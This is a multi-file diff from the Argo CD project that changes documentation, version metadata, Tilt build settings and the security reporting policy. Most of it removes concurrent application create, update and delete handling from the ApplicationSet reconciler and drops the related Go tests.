notification: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/notification} FORCE_LOG_COLORS=4 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_BINARY_NAME=argocd-notifications $COMMAND --loglevel debug --application-namespaces=${ARGOCD_APPLICATION_NAMESPACES:-''} --self-service-notification-enabled=${ARGOCD_NOTIFICATION_CONTROLLER_SELF_SERVICE_NOTIFICATION_ENABLED:-'false'}"


@@ -19,7 +19,7 @@
## What is Argo CD?
Argo CD is a declarative GitOps continuous delivery tool for Kubernetes.
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes.
![Argo CD UI](docs/assets/argocd-ui.gif)
@@ -45,7 +45,7 @@ Check live demo at https://cd.apps.argoproj.io/.
You can reach the Argo CD community and developers via the following channels:
* Q & A : [GitHub Discussions](https://github.com/argoproj/argo-cd/discussions)
* Q & A : [Github Discussions](https://github.com/argoproj/argo-cd/discussions)
* Chat : [The #argo-cd Slack channel](https://argoproj.github.io/community/join-slack)
* Contributors Office Hours: [Every Thursday](https://calendar.google.com/calendar/u/0/embed?src=argoproj@gmail.com) | [Agenda](https://docs.google.com/document/d/1xkoFkVviB70YBzSEa4bDnu-rUZ1sIFtwKKG1Uw8XsY8)
* User Community meeting: [First Wednesday of the month](https://calendar.google.com/calendar/u/0/embed?src=argoproj@gmail.com) | [Agenda](https://docs.google.com/document/d/1ttgw98MO45Dq7ZUHpIiOIEfbyeitKHNfMjbY5dLLMKQ)


@@ -3,9 +3,9 @@ header:
expiration-date: '2024-10-31T00:00:00.000Z' # One year from initial release.
last-updated: '2023-10-27'
last-reviewed: '2023-10-27'
commit-hash: d91a2ab3bf1b1143fb273fa06f54073fc78f41f1
commit-hash: 814db444c36503851dc3d45cf9c44394821ca1a4
project-url: https://github.com/argoproj/argo-cd
project-release: v3.5.0
project-release: v3.4.0
changelog: https://github.com/argoproj/argo-cd/releases
license: https://github.com/argoproj/argo-cd/blob/master/LICENSE
project-lifecycle:


@@ -80,7 +80,24 @@ We will publish security advisories using the
feature to keep our community well-informed, and will credit you for your
findings (unless you prefer to stay anonymous, of course).
To report a vulnerability to the Argo CD team, open a draft GitHub security advisory: https://github.com/argoproj/argo-cd/security/advisories/new
There are two ways to report a vulnerability to the Argo CD team:
* By opening a draft GitHub security advisory: https://github.com/argoproj/argo-cd/security/advisories/new
* By e-mail to the following address: cncf-argo-security@lists.cncf.io
## Internet Bug Bounty collaboration
We're happy to announce that the Argo project is collaborating with the great
folks over at
[Hacker One](https://hackerone.com/) and their
[Internet Bug Bounty program](https://hackerone.com/ibb)
to reward the awesome people who find security vulnerabilities in the four
main Argo projects (CD, Events, Rollouts and Workflows) and then work with
us to fix and disclose them in a responsible manner.
If you report a vulnerability to us as outlined in this security policy, we
will work together with you to find out whether your finding is eligible for
claiming a bounty, and also on how to claim it.
## Securing your Argo CD Instance


@@ -257,11 +257,11 @@ k8s_resource(
# ui dependencies
local_resource(
'node-modules',
'pnpm install',
'yarn',
dir='ui',
deps = [
'ui/package.json',
'ui/pnpm-lock.yaml',
'ui/yarn.lock',
],
allow_parallel=True,
)
@@ -271,11 +271,11 @@ docker_build(
'argocd-ui',
context='.',
dockerfile='Dockerfile.ui.tilt',
entrypoint=['sh', '-c', 'cd /app/ui && pnpm start'],
entrypoint=['sh', '-c', 'cd /app/ui && yarn start'],
only=['ui'],
live_update=[
sync('ui', '/app/ui'),
run('sh -c "cd /app/ui && pnpm install"', trigger=['/app/ui/package.json', '/app/ui/pnpm-lock.yaml']),
run('sh -c "cd /app/ui && yarn install"', trigger=['/app/ui/package.json', '/app/ui/yarn.lock']),
],
)


@@ -240,7 +240,6 @@ Currently, the following organizations are **officially** using Argo CD:
1. [Mission Lane](https://missionlane.com)
1. [mixi Group](https://mixi.co.jp/)
1. [Moengage](https://www.moengage.com/)
1. [Mollie](https://www.mollie.com/)
1. [Money Forward](https://corp.moneyforward.com/en/)
1. [MongoDB](https://www.mongodb.com/)
1. [MOO Print](https://www.moo.com/)
@@ -381,7 +380,6 @@ Currently, the following organizations are **officially** using Argo CD:
1. [Tailor Brands](https://www.tailorbrands.com)
1. [Tamkeen Technologies](https://tamkeentech.sa/)
1. [TBC Bank](https://tbcbank.ge/)
1. [Techcom Securities](https://www.tcbs.com.vn/)
1. [Techcombank](https://www.techcombank.com.vn/trang-chu)
1. [Technacy](https://www.technacy.it/)
1. [Telavita](https://www.telavita.com.br/)


@@ -1 +1 @@
3.5.0
3.4.0-rc4


@@ -24,13 +24,11 @@ import (
"sort"
"strconv"
"strings"
"sync"
"time"
"github.com/google/go-cmp/cmp"
"github.com/google/go-cmp/cmp/cmpopts"
log "github.com/sirupsen/logrus"
"golang.org/x/sync/errgroup"
corev1 "k8s.io/api/core/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
@@ -108,16 +106,15 @@ type ApplicationSetReconciler struct {
Policy argov1alpha1.ApplicationsSyncPolicy
EnablePolicyOverride bool
utils.Renderer
ArgoCDNamespace string
ApplicationSetNamespaces []string
EnableProgressiveSyncs bool
SCMRootCAPath string
GlobalPreservedAnnotations []string
GlobalPreservedLabels []string
Metrics *metrics.ApplicationsetMetrics
MaxResourcesStatusCount int
ClusterInformer *settings.ClusterInformer
ConcurrentApplicationUpdates int
ArgoCDNamespace string
ApplicationSetNamespaces []string
EnableProgressiveSyncs bool
SCMRootCAPath string
GlobalPreservedAnnotations []string
GlobalPreservedLabels []string
Metrics *metrics.ApplicationsetMetrics
MaxResourcesStatusCount int
ClusterInformer *settings.ClusterInformer
}
// +kubebuilder:rbac:groups=argoproj.io,resources=applicationsets,verbs=get;list;watch;create;update;patch;delete
@@ -694,133 +691,108 @@ func (r *ApplicationSetReconciler) SetupWithManager(mgr ctrl.Manager, enableProg
// - For an existing application, it will call update
// The function also adds an owner reference to all applications, and uses it to delete them.
func (r *ApplicationSetReconciler) createOrUpdateInCluster(ctx context.Context, logCtx *log.Entry, applicationSet argov1alpha1.ApplicationSet, desiredApplications []argov1alpha1.Application) error {
// Build the diff config once per reconcile.
// Diff config is per applicationset, so generate it once for all applications
diffConfig, err := utils.BuildIgnoreDiffConfig(applicationSet.Spec.IgnoreApplicationDifferences, normalizers.IgnoreNormalizerOpts{})
if err != nil {
return fmt.Errorf("failed to build ignore diff config: %w", err)
}
g, ctx := errgroup.WithContext(ctx)
concurrency := r.concurrency()
g.SetLimit(concurrency)
var appErrorsMu sync.Mutex
appErrors := map[string]error{}
var firstError error
// Creates or updates the application in appList
for _, generatedApp := range desiredApplications {
appLog := logCtx.WithFields(applog.GetAppLogFields(&generatedApp))
// Normalize to avoid fighting with the application controller.
generatedApp.Spec = *argoutil.NormalizeApplicationSpec(&generatedApp.Spec)
g.Go(func() error {
appLog := logCtx.WithFields(applog.GetAppLogFields(&generatedApp))
found := &argov1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: generatedApp.Name,
Namespace: generatedApp.Namespace,
},
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
found := &argov1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: generatedApp.Name,
Namespace: generatedApp.Namespace,
},
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
}
action, err := utils.CreateOrUpdate(ctx, appLog, r.Client, applicationSet.Spec.IgnoreApplicationDifferences, normalizers.IgnoreNormalizerOpts{}, found, func() error {
// Copy only the Application/ObjectMeta fields that are significant, from the generatedApp
found.Spec = generatedApp.Spec
// allow setting the Operation field to trigger a sync operation on an Application
if generatedApp.Operation != nil {
found.Operation = generatedApp.Operation
}
action, err := utils.CreateOrUpdate(ctx, appLog, r.Client, diffConfig, found, func() error {
// Copy only the Application/ObjectMeta fields that are significant, from the generatedApp
found.Spec = generatedApp.Spec
preservedAnnotations := make([]string, 0)
preservedLabels := make([]string, 0)
// allow setting the Operation field to trigger a sync operation on an Application
if generatedApp.Operation != nil {
found.Operation = generatedApp.Operation
}
preservedAnnotations := make([]string, 0)
preservedLabels := make([]string, 0)
if applicationSet.Spec.PreservedFields != nil {
preservedAnnotations = append(preservedAnnotations, applicationSet.Spec.PreservedFields.Annotations...)
preservedLabels = append(preservedLabels, applicationSet.Spec.PreservedFields.Labels...)
}
if len(r.GlobalPreservedAnnotations) > 0 {
preservedAnnotations = append(preservedAnnotations, r.GlobalPreservedAnnotations...)
}
if len(r.GlobalPreservedLabels) > 0 {
preservedLabels = append(preservedLabels, r.GlobalPreservedLabels...)
}
// Preserve specially treated argo cd annotations:
// * https://github.com/argoproj/applicationset/issues/180
// * https://github.com/argoproj/argo-cd/issues/10500
preservedAnnotations = append(preservedAnnotations, defaultPreservedAnnotations...)
for _, key := range preservedAnnotations {
if state, exists := found.Annotations[key]; exists {
if generatedApp.Annotations == nil {
generatedApp.Annotations = map[string]string{}
}
generatedApp.Annotations[key] = state
}
}
for _, key := range preservedLabels {
if state, exists := found.Labels[key]; exists {
if generatedApp.Labels == nil {
generatedApp.Labels = map[string]string{}
}
generatedApp.Labels[key] = state
}
}
// Preserve deleting finalizers and avoid diff conflicts
for _, finalizer := range defaultPreservedFinalizers {
for _, f := range found.Finalizers {
// For finalizers, use prefix matching in case the finalizer contains "/"-delimited stages
if strings.HasPrefix(f, finalizer) {
generatedApp.Finalizers = append(generatedApp.Finalizers, f)
}
}
}
found.Annotations = generatedApp.Annotations
found.Labels = generatedApp.Labels
found.Finalizers = generatedApp.Finalizers
return controllerutil.SetControllerReference(&applicationSet, found, r.Scheme)
})
if err != nil {
appLog.WithError(err).WithField("action", action).Errorf("failed to %s Application", action)
// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return err
}
// For backwards compatibility with sequential behavior: continue processing other applications
// but record the error keyed by app name so we can deterministically return the error from
// the lexicographically first failing app, regardless of goroutine scheduling order.
appErrorsMu.Lock()
appErrors[generatedApp.Name] = err
appErrorsMu.Unlock()
return nil
if applicationSet.Spec.PreservedFields != nil {
preservedAnnotations = append(preservedAnnotations, applicationSet.Spec.PreservedFields.Annotations...)
preservedLabels = append(preservedLabels, applicationSet.Spec.PreservedFields.Labels...)
}
if action != controllerutil.OperationResultNone {
// Don't pollute etcd with "unchanged Application" events
r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, fmt.Sprint(action), "%s Application %q", action, generatedApp.Name)
appLog.Logf(log.InfoLevel, "%s Application", action)
} else {
// "unchanged Application" can be inferred by Reconcile Complete with no action being listed
// Or enable debug logging
appLog.Logf(log.DebugLevel, "%s Application", action)
if len(r.GlobalPreservedAnnotations) > 0 {
preservedAnnotations = append(preservedAnnotations, r.GlobalPreservedAnnotations...)
}
return nil
if len(r.GlobalPreservedLabels) > 0 {
preservedLabels = append(preservedLabels, r.GlobalPreservedLabels...)
}
// Preserve specially treated argo cd annotations:
// * https://github.com/argoproj/applicationset/issues/180
// * https://github.com/argoproj/argo-cd/issues/10500
preservedAnnotations = append(preservedAnnotations, defaultPreservedAnnotations...)
for _, key := range preservedAnnotations {
if state, exists := found.Annotations[key]; exists {
if generatedApp.Annotations == nil {
generatedApp.Annotations = map[string]string{}
}
generatedApp.Annotations[key] = state
}
}
for _, key := range preservedLabels {
if state, exists := found.Labels[key]; exists {
if generatedApp.Labels == nil {
generatedApp.Labels = map[string]string{}
}
generatedApp.Labels[key] = state
}
}
// Preserve deleting finalizers and avoid diff conflicts
for _, finalizer := range defaultPreservedFinalizers {
for _, f := range found.Finalizers {
// For finalizers, use prefix matching in case it contains "/" stages
if strings.HasPrefix(f, finalizer) {
generatedApp.Finalizers = append(generatedApp.Finalizers, f)
}
}
}
found.Annotations = generatedApp.Annotations
found.Labels = generatedApp.Labels
found.Finalizers = generatedApp.Finalizers
return controllerutil.SetControllerReference(&applicationSet, found, r.Scheme)
})
}
if err != nil {
appLog.WithError(err).WithField("action", action).Errorf("failed to %s Application", action)
if firstError == nil {
firstError = err
}
continue
}
if err := g.Wait(); errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return err
if action != controllerutil.OperationResultNone {
// Don't pollute etcd with "unchanged Application" events
r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, fmt.Sprint(action), "%s Application %q", action, generatedApp.Name)
appLog.Logf(log.InfoLevel, "%s Application", action)
} else {
// "unchanged Application" can be inferred by Reconcile Complete with no action being listed
// Or enable debug logging
appLog.Logf(log.DebugLevel, "%s Application", action)
}
}
return firstAppError(appErrors)
return firstError
}
// createInCluster will filter from the desiredApplications only the application that needs to be created
@@ -880,84 +852,36 @@ func (r *ApplicationSetReconciler) deleteInCluster(ctx context.Context, logCtx *
 		m[app.Name] = true
 	}
-	g, ctx := errgroup.WithContext(ctx)
-	concurrency := r.concurrency()
-	g.SetLimit(concurrency)
-	var appErrorsMu sync.Mutex
-	appErrors := map[string]error{}
 	// Delete apps that are not in m[string]bool
+	var firstError error
 	for _, app := range current {
-		_, exists := m[app.Name]
-		appLogCtx := logCtx.WithFields(applog.GetAppLogFields(&app))
-		g.Go(func() error {
-			if !exists {
-				// Removes the Argo CD resources finalizer if the application contains an invalid target (eg missing cluster)
-				err := r.removeFinalizerOnInvalidDestination(ctx, applicationSet, &app, clusterList, appLogCtx)
-				if err != nil {
-					appLogCtx.WithError(err).Error("failed to update Application")
-					// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
-					if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
-						return err
-					}
-					// For backwards compatibility with sequential behavior: continue processing other applications
-					// but record the error keyed by app name so we can deterministically return the error from
-					// the lexicographically first failing app, regardless of goroutine scheduling order.
-					appErrorsMu.Lock()
-					appErrors[app.Name] = err
-					appErrorsMu.Unlock()
-					return nil
-				}
-				err = r.Delete(ctx, &app)
-				if err != nil {
-					appLogCtx.WithError(err).Error("failed to delete Application")
-					// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
-					if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
-						return err
-					}
-					appErrorsMu.Lock()
-					appErrors[app.Name] = err
-					appErrorsMu.Unlock()
-					return nil
-				}
-				r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, "Deleted", "Deleted Application %q", app.Name)
-				appLogCtx.Log(log.InfoLevel, "Deleted application")
-			}
-			return nil
-		})
+		logCtx = logCtx.WithFields(applog.GetAppLogFields(&app))
+		_, exists := m[app.Name]
+		if exists {
+			continue
+		}
+		// Removes the Argo CD resources finalizer if the application contains an invalid target (eg missing cluster)
+		err := r.removeFinalizerOnInvalidDestination(ctx, applicationSet, &app, clusterList, logCtx)
+		if err != nil {
+			logCtx.WithError(err).Error("failed to update Application")
+			if firstError == nil {
+				firstError = err
+			}
+			continue
+		}
+		err = r.Delete(ctx, &app)
+		if err != nil {
+			logCtx.WithError(err).Error("failed to delete Application")
+			if firstError == nil {
+				firstError = err
+			}
+			continue
+		}
+		r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, "Deleted", "Deleted Application %q", app.Name)
+		logCtx.Log(log.InfoLevel, "Deleted application")
 	}
-	if err := g.Wait(); errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
-		return err
-	}
-	return firstAppError(appErrors)
+	return firstError
 }
-// concurrency returns the configured number of concurrent application updates, defaulting to 1.
-func (r *ApplicationSetReconciler) concurrency() int {
-	if r.ConcurrentApplicationUpdates <= 0 {
-		return 1
-	}
-	return r.ConcurrentApplicationUpdates
-}
-// firstAppError returns the error associated with the lexicographically smallest application name
-// in the provided map. This gives a deterministic result when multiple goroutines may have
-// recorded errors concurrently, matching the behavior of the original sequential loop where the
-// first application in iteration order would determine the returned error.
-func firstAppError(appErrors map[string]error) error {
-	if len(appErrors) == 0 {
-		return nil
-	}
-	names := make([]string, 0, len(appErrors))
-	for name := range appErrors {
-		names = append(names, name)
-	}
-	sort.Strings(names)
-	return appErrors[names[0]]
-}
// removeFinalizerOnInvalidDestination removes the Argo CD resources finalizer if the application contains an invalid target (eg missing cluster)


@@ -25,7 +25,6 @@ import (
ctrl "sigs.k8s.io/controller-runtime"
crtclient "sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/client/fake"
"sigs.k8s.io/controller-runtime/pkg/client/interceptor"
"sigs.k8s.io/controller-runtime/pkg/controller/controllerutil"
"sigs.k8s.io/controller-runtime/pkg/event"
@@ -1078,70 +1077,6 @@ func TestCreateOrUpdateInCluster(t *testing.T) {
},
},
},
{
name: "Ensure that unnormalized live spec does not cause a spurious patch",
appSet: v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSetSpec{
Template: v1alpha1.ApplicationSetTemplate{
Spec: v1alpha1.ApplicationSpec{
Project: "project",
},
},
},
},
existingApps: []v1alpha1.Application{
{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
ResourceVersion: "2",
},
Spec: v1alpha1.ApplicationSpec{
Project: "project",
// Without normalizing the live object, the equality check
// sees &SyncPolicy{} vs nil and issues an unnecessary patch.
SyncPolicy: &v1alpha1.SyncPolicy{},
},
},
},
desiredApps: []v1alpha1.Application{
{
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{
Project: "project",
SyncPolicy: nil,
},
},
},
expected: []v1alpha1.Application{
{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
ResourceVersion: "2",
},
Spec: v1alpha1.ApplicationSpec{
Project: "project",
SyncPolicy: &v1alpha1.SyncPolicy{},
},
},
},
},
{
name: "Ensure that argocd pre-delete and post-delete finalizers are preserved from an existing app",
appSet: v1alpha1.ApplicationSet{
@@ -1251,374 +1186,6 @@ func TestCreateOrUpdateInCluster(t *testing.T) {
}
}
func TestCreateOrUpdateInCluster_Concurrent(t *testing.T) {
scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
require.NoError(t, err)
appSet := v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
}
t.Run("all apps are created correctly with concurrency > 1", func(t *testing.T) {
desiredApps := make([]v1alpha1.Application, 5)
for i := range desiredApps {
desiredApps[i] = v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: fmt.Sprintf("app%d", i),
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{Project: "project"},
}
}
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
ConcurrentApplicationUpdates: 5,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, desiredApps)
require.NoError(t, err)
for _, desired := range desiredApps {
got := &v1alpha1.Application{}
require.NoError(t, fakeClient.Get(t.Context(), crtclient.ObjectKey{Namespace: desired.Namespace, Name: desired.Name}, got))
assert.Equal(t, desired.Spec.Project, got.Spec.Project)
}
})
t.Run("non-context errors from concurrent goroutines are collected and one is returned", func(t *testing.T) {
existingApps := make([]v1alpha1.Application, 5)
initObjs := []crtclient.Object{&appSet}
for i := range existingApps {
existingApps[i] = v1alpha1.Application{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: fmt.Sprintf("app%d", i),
Namespace: "namespace",
ResourceVersion: "1",
},
Spec: v1alpha1.ApplicationSpec{Project: "old"},
}
app := existingApps[i].DeepCopy()
require.NoError(t, controllerutil.SetControllerReference(&appSet, app, scheme))
initObjs = append(initObjs, app)
}
desiredApps := make([]v1alpha1.Application, 5)
for i := range desiredApps {
desiredApps[i] = v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: fmt.Sprintf("app%d", i),
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{Project: "new"},
}
}
patchErr := errors.New("some patch error")
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return patchErr
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
ConcurrentApplicationUpdates: 5,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, desiredApps)
require.ErrorIs(t, err, patchErr)
})
}
func TestCreateOrUpdateInCluster_ContextCancellation(t *testing.T) {
scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
require.NoError(t, err)
appSet := v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
}
existingApp := v1alpha1.Application{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
ResourceVersion: "1",
},
Spec: v1alpha1.ApplicationSpec{Project: "old"},
}
desiredApp := v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{Project: "new"},
}
t.Run("context canceled on patch is returned directly", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
initObjs = append(initObjs, app)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return context.Canceled
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
require.ErrorIs(t, err, context.Canceled)
})
t.Run("context deadline exceeded on patch is returned directly", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
initObjs = append(initObjs, app)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return context.DeadlineExceeded
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
require.ErrorIs(t, err, context.DeadlineExceeded)
})
t.Run("non-context error is collected and returned after all goroutines finish", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
initObjs = append(initObjs, app)
patchErr := errors.New("some patch error")
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return patchErr
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
require.ErrorIs(t, err, patchErr)
})
t.Run("context canceled on create is returned directly", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Create: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.CreateOption) error {
return context.Canceled
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
newApp := v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{Name: "newapp", Namespace: "namespace"},
Spec: v1alpha1.ApplicationSpec{Project: "default"},
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{newApp})
require.ErrorIs(t, err, context.Canceled)
})
}
func TestDeleteInCluster_ContextCancellation(t *testing.T) {
scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
require.NoError(t, err)
err = corev1.AddToScheme(scheme)
require.NoError(t, err)
appSet := v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
}
existingApp := v1alpha1.Application{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "delete-me",
Namespace: "namespace",
ResourceVersion: "1",
},
Spec: v1alpha1.ApplicationSpec{Project: "project"},
}
makeReconciler := func(t *testing.T, fakeClient crtclient.Client) ApplicationSetReconciler {
t.Helper()
kubeclientset := kubefake.NewClientset()
clusterInformer, err := settings.NewClusterInformer(kubeclientset, "namespace")
require.NoError(t, err)
cancel := startAndSyncInformer(t, clusterInformer)
t.Cleanup(cancel)
return ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
KubeClientset: kubeclientset,
Metrics: appsetmetrics.NewFakeAppsetMetrics(),
ClusterInformer: clusterInformer,
}
}
t.Run("context canceled on delete is returned directly", func(t *testing.T) {
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet, app).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
return context.Canceled
},
}).
Build()
r := makeReconciler(t, fakeClient)
err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
require.ErrorIs(t, err, context.Canceled)
})
t.Run("context deadline exceeded on delete is returned directly", func(t *testing.T) {
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet, app).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
return context.DeadlineExceeded
},
}).
Build()
r := makeReconciler(t, fakeClient)
err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
require.ErrorIs(t, err, context.DeadlineExceeded)
})
t.Run("non-context delete error is collected and returned", func(t *testing.T) {
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
deleteErr := errors.New("delete failed")
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet, app).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
return deleteErr
},
}).
Build()
r := makeReconciler(t, fakeClient)
err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
require.ErrorIs(t, err, deleteErr)
})
}
func TestRemoveFinalizerOnInvalidDestination_FinalizerTypes(t *testing.T) {
